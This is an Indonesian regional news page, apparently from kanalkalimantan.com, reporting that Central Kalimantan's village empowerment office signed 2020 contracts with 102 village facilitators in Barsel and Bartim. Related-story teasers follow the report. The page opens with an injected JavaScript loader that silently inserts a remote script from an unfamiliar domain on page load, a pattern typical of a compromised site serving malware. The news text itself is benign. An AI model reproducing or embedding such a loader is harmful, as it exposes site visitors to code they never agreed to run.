(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
BUNTOK, Dinas Pemberdayaan Masyarakat dan Desa (DPMD) Provinsi Kalteng melaksanaan penandatangan kontrak kerja bagi Kabupaten Barsel dan Bartim untuk petugas Program Pembangunan dan Pemberdayaan Masyarakat Desa (P3MD), di aula kantor DSPMD Barsel, Kamis (19/12).
Kepala DPMD Provinsi Kalteng Hamka SPd MPd mengatakan, pihaknya melakukan penandatangan kontrak kerja kepada 102 orang P3MD dari dua Kabupaten yakni Barsel dan Bartim.
“Hari ini penandatangan kontrak kerja untuk petugas P3MD sekaligus di dua kabupaten,†kata Hamka.
Ia mengatakan, petugas yang menandatangi kontrak kerja ini masih merupakan petugas P3MD yang terdahulu, karena masih memenuhi kriteria dan teruji berdasarkan laporan dari desa dan kecamatan.
“Karena mereka teruji sebagai pendamping desa yang profesional, maka kita tetap rekrut kembali dan hari ini kita lakukan tanda tangan kontrak kerja untuk tahun 2020,†ucap Hamka.
Petugas pendamping desa bisa menjalankan tugas sebaik mungkin, terlebih dalam mengawal dana desa yang disalurkan sesuai aturan berlaku, sehingga desa itu dapat berkembang.
“Kita berharap kiranya petugas dapat mengawal dana desa, sehingga penyaluran dana desa tepat sasaran,†pungkas Hamka. (digdo)
KANALKALIMANTAN.COM, BANJARMASIN — Badan Eksekutif Mahasiswa (BEM) Seluruh Indonesia (SI) Kalimantan Selatan (Kalsel) menyatakan sikap… Read More
KANALKALIMANTAN.COM, BANJARBARU - Dinas Perumahan Rakyat dan Kawasan Permukiman (Disperkim) Provinsi Kalimantan Selatan (Kalsel) menegaskan… Read More
KANALKALIMANTAN.COM, BANJARMASIN – Wacana Pemilihan Kepala Daerah (Pilkada) melalui Dewan Perwakilan Rakyat Daerah (DPRD) menuai… Read More
KANALKALIMANTAN.COM, PARINGIN – Pekan pertama masa pemulihan pascabanjir di Kabupaten Balangan, sejumlah perbaikan sudah mulai… Read More
KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten (Pemkab) Kapuas dan Kejaksaan Negeri (Kejari) Kapuas melakukan serah… Read More
KANALKALIMANTAN.COM, KUALA KAPUAS - Warga binaan Rumah Tahanan Negara (Rutan) Kelas II B Kapuas berkumpul… Read More
This website uses cookies.